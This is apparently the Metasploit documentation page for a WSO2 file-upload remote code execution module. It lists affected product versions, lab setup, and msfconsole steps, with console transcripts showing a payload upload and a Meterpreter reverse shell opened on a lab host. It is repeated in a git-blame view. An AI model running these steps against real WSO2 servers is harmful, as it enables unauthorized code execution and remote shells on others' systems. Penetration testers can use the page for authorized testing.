documentation/modules/exploit/multi/http/wso2_file_upload_rce.md

## Vulnerable Application

Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager
2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics
5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise 
Integrator 6.2.0 and above through 6.6.0.

Download WSO2 API Manager [4.0.0](https://wso2.com/api-management/previous-releases/) or another
version < 4.1.0 from the same link.

Download and install [JDK 1.8](https://www.oracle.com/ca-en/java/technologies/javase/javase8u211-later-archive-downloads.html) 
and set `$JAVA_HOME` in your environment.

Start the vulnerable application with `./wso2am-4.0.0/bin/api-manager.sh`. More information on target setup can be found
[here](https://apim.docs.wso2.com/en/latest/install-and-setup/install-and-setup-overview/).

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use multi/http/wso2_file_upload_rce`
1. Do: `set rhosts [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Scenarios

### WSO2 API Manager 4.0.0 on Ubuntu 20.04.1

```
msf6 > use multi/http/wso2_file_upload_rce
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > set rhosts 172.16.199.173
rhosts => 172.16.199.173
msf6 exploit(multi/http/wso2_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/wso2_file_upload_rce) > check
[*] 172.16.199.173:9443 - The target appears to be vulnerable.
msf6 exploit(multi/http/wso2_file_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Sending stage (58851 bytes) to 172.16.199.173
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.173:34282 ) at 2022-04-26 10:58:31 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.13.0-40-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
```

### WSO2 API Manager 3.0.0 on Ubuntu 20.04.1
```
msf6 > use multi/http/wso2_file_upload_rce
msf6 exploit(multi/http/wso2_file_upload_rce) > set rhosts 172.16.199.173
rhosts => 172.16.199.173
msf6 exploit(multi/http/wso2_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/wso2_file_upload_rce) > check
[*] 172.16.199.173:9443 - The target appears to be vulnerable.
msf6 exploit(multi/http/wso2_file_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Sending stage (58851 bytes) to 172.16.199.173
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.173:33564 ) at 2022-04-26 12:09:18 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.13.0-40-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
```
Add WSO2 file upload RCE module 2022-04-26 12:29:12 -07:00			`## Vulnerable Application`

			`Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager`
			`2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics`
			`5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise`
			`Integrator 6.2.0 and above through 6.6.0.`

			`Download WSO2 API Manager [4.0.0](https://wso2.com/api-management/previous-releases/) or another`
Apply suggestions from @bcoles code review 2022-04-26 13:40:25 -07:00			`version < 4.1.0 from the same link.`
Add WSO2 file upload RCE module 2022-04-26 12:29:12 -07:00
			`Download and install [JDK 1.8](https://www.oracle.com/ca-en/java/technologies/javase/javase8u211-later-archive-downloads.html)`
Apply suggestions from @bcoles code review 2022-04-26 13:40:25 -07:00			and set `$JAVA_HOME` in your environment.
Add WSO2 file upload RCE module 2022-04-26 12:29:12 -07:00
			Start the vulnerable application with `./wso2am-4.0.0/bin/api-manager.sh`. More information on target setup can be found
Apply suggestions from @bcoles code review 2022-04-26 13:40:25 -07:00			`[here](https://apim.docs.wso2.com/en/latest/install-and-setup/install-and-setup-overview/).`
Add WSO2 file upload RCE module 2022-04-26 12:29:12 -07:00
			`## Verification Steps`

			`1. Install the application`
			`1. Start msfconsole`
			1. Do: `use multi/http/wso2_file_upload_rce`
			1. Do: `set rhosts [ip]`
			1. Do: `set lhost [ip]`
			1. Do: `run`
			`1. You should get a shell.`

			`## Scenarios`

			`### WSO2 API Manager 4.0.0 on Ubuntu 20.04.1`

			```
			`msf6 > use multi/http/wso2_file_upload_rce`
			`[*] Using configured payload java/meterpreter/reverse_tcp`
			`msf6 exploit(multi/http/wso2_file_upload_rce) > set rhosts 172.16.199.173`
			`rhosts => 172.16.199.173`
			`msf6 exploit(multi/http/wso2_file_upload_rce) > set lhost 172.16.199.1`
			`lhost => 172.16.199.1`
			`msf6 exploit(multi/http/wso2_file_upload_rce) > check`
			`[*] 172.16.199.173:9443 - The target appears to be vulnerable.`
			`msf6 exploit(multi/http/wso2_file_upload_rce) > run`

			`[*] Started reverse TCP handler on 172.16.199.1:4444`
			`[*] Preparing payload...`
			`[*] Uploading payload...`
			`[+] Payload uploaded successfully`
			`[*] Executing payload...`
Responded to comments added retry_until_true 2022-04-27 09:45:18 -07:00			`[*] Waiting for shell...`
			`[*] Waiting for shell...`
			`[*] Waiting for shell...`
			`[*] Waiting for shell...`
Add WSO2 file upload RCE module 2022-04-26 12:29:12 -07:00			`[*] Sending stage (58851 bytes) to 172.16.199.173`
			`[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.173:34282 ) at 2022-04-26 10:58:31 -0700`

			`meterpreter > getuid`
			`Server username: msfuser`
			`meterpreter > sysinfo`
			`Computer : ubuntu`
			`OS : Linux 5.13.0-40-generic (amd64)`
			`Architecture : x64`
			`System Language : en_US`
			`Meterpreter : java/linux`
			```

			`### WSO2 API Manager 3.0.0 on Ubuntu 20.04.1`
			```
			`msf6 > use multi/http/wso2_file_upload_rce`
			`msf6 exploit(multi/http/wso2_file_upload_rce) > set rhosts 172.16.199.173`
			`rhosts => 172.16.199.173`
			`msf6 exploit(multi/http/wso2_file_upload_rce) > set lhost 172.16.199.1`
			`lhost => 172.16.199.1`
			`msf6 exploit(multi/http/wso2_file_upload_rce) > check`
			`[*] 172.16.199.173:9443 - The target appears to be vulnerable.`
			`msf6 exploit(multi/http/wso2_file_upload_rce) > run`

			`[*] Started reverse TCP handler on 172.16.199.1:4444`
			`[*] Preparing payload...`
			`[*] Uploading payload...`
			`[+] Payload uploaded successfully`
			`[*] Executing payload...`
Responded to comments added retry_until_true 2022-04-27 09:45:18 -07:00			`[*] Waiting for shell...`
			`[*] Waiting for shell...`
			`[*] Waiting for shell...`
			`[*] Waiting for shell...`
Add WSO2 file upload RCE module 2022-04-26 12:29:12 -07:00			`[*] Sending stage (58851 bytes) to 172.16.199.173`
			`[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.173:33564 ) at 2022-04-26 12:09:18 -0700`

			`meterpreter > getuid`
			`Server username: msfuser`
			`meterpreter > sysinfo`
			`Computer : ubuntu`
			`OS : Linux 5.13.0-40-generic (amd64)`
			`Architecture : x64`
			`System Language : en_US`
			`Meterpreter : java/linux`
			```